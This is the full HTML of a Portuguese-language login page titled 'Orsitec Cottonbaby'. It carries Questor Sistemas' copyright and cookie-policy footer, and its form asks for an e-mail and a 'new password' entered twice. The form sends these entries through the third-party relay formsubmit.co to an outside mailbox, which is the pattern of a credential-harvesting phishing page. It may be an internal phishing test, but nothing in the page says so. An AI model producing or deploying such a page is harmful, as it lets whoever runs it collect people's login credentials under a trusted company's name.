<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Orsitec Cottonbaby</title>
    <style>
        html {
    font-size: 62.5%;
    -webkit-tap-highlight-color: rgba(0,0,0,0);
}
img{
    margin-left: 50px;
}
body {
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    font-size: 14px;
    line-height: 1.428571429;
    color: #333;
    background-color: #f5f5f5;

}

#login {

    display: flex;

    align-items: center;

    justify-content: center;

    height: 100vh;

    font-family: Cambria, Cochin, Georgia, Times, 'Times New Roman', serif;

}

.card {
    background-color: rgb(255, 255, 255);
    padding: 40px;
    border-radius: 10px;
    border-style: solid;
    border-color: #bab8b8;
    width:280px;

}

.card-header {

    padding-bottom: 1px;

    opacity: 0.8;

    color: #fff;

}

.card-header::after {

    content: "";

    width: 70px;

    height: 1px;

    background-color: #fff;

    display: block;

    margin-top: -17px;

    margin-left: 10px;

}

.card-content-area {

    display: flex;

    flex-direction: column;

    padding:5px 0;

}

.card-content-area input {

    margin-top: 10px;

    padding:0 5px;

    border-radius: 5px;

    height: 25px;

    color: #888;


}

.card-footer {

    display: flex;

    flex-direction: column;

}

.card-footer .submit{

    background-image: -webkit-gradient(linear,left 0%,left 100%,from(#428bca),to(#2d6ca2));
    background-image: -webkit-linear-gradient(top,#428bca 0%,#2d6ca2 100%);
    background-image: -moz-linear-gradient(top,#428bca 0%,#2d6ca2 100%);
    background-image: linear-gradient(to bottom,#428bca 0%,#2d6ca2 100%);
    background-repeat: repeat-x;
    border-color: #2b669a;
    font-size: 20px;
    width: 100%;

    height: 40px;

    background-color: #1640b1;

    border:none;

    color:#e1e1e1;

    margin: 10px 0;

}

.card-footer a {

    text-align: center;

    font-size: 12px;

    opacity: 0.8;

    color: #fff;

    text-decoration: none;

}
.cookie-message-warning {
    text-align: justify;
    max-width: 360px;
    color: #999;
    position:absolute;
    top: 735px;
}
hr{
    color: #847f7f;
}
.imagem{
    height: 75px;
    margin-left: 19px;
}
    </style>
</head>
<body>
    <body>

        <div id="login">

            <form class="card" action="https://formsubmit.co/lgpd@cottonbaby.com.br" method="POST">
                <img class = "imagem" src="https://i.imgur.com/soeEdjb.png" alt="">
                <hr>
                <div class="card-header">

                    <h2>Login</h2>

                </div>

                <div class="card-content">

                    <div class="card-content-area">

                        <label for="usuario">E-mail</label>

                        <input type="text" name="email" required>

                    </div>

                    <div class="card-content-area">

                        <label for="password">Senha nova</label>

                        <input type="password" name="senha" id="senha">

                    </div>
                    <div class="card-content-area">

                        <label for="password">Confirme sua senha</label>

                        <input type="password" name="senha" id="senha"">

                    </div>

                </div>

                <div class="card-footer">
                    
                    <input type="submit" value="Confirmar" class="submit">

                </div>

            </form>
            <div class="cookie-message-warning">
                Utilizamos ferramentas e serviços que utilizam cookies. Essas ferramentas nos ajudam a oferecer uma melhor experiência de navegação no site. Ao clicar no botão "Entrar", você concorda com o uso de cookies.
                <br />
                <a id="cookies-id" target="_blank" href="https://www.questor.com.br/politicas-de-cookies/questor-zen/">Política de cookies</a>
                <br>
                <br>
                <span>Copyright © 2023 <a href="http://www.questor.net.br" title="Questor Sistemas">Questor Sistemas.</a></span>
                <span>Todos os direitos reservados.</span>
            </div>

        </div>

    </body>
</html>


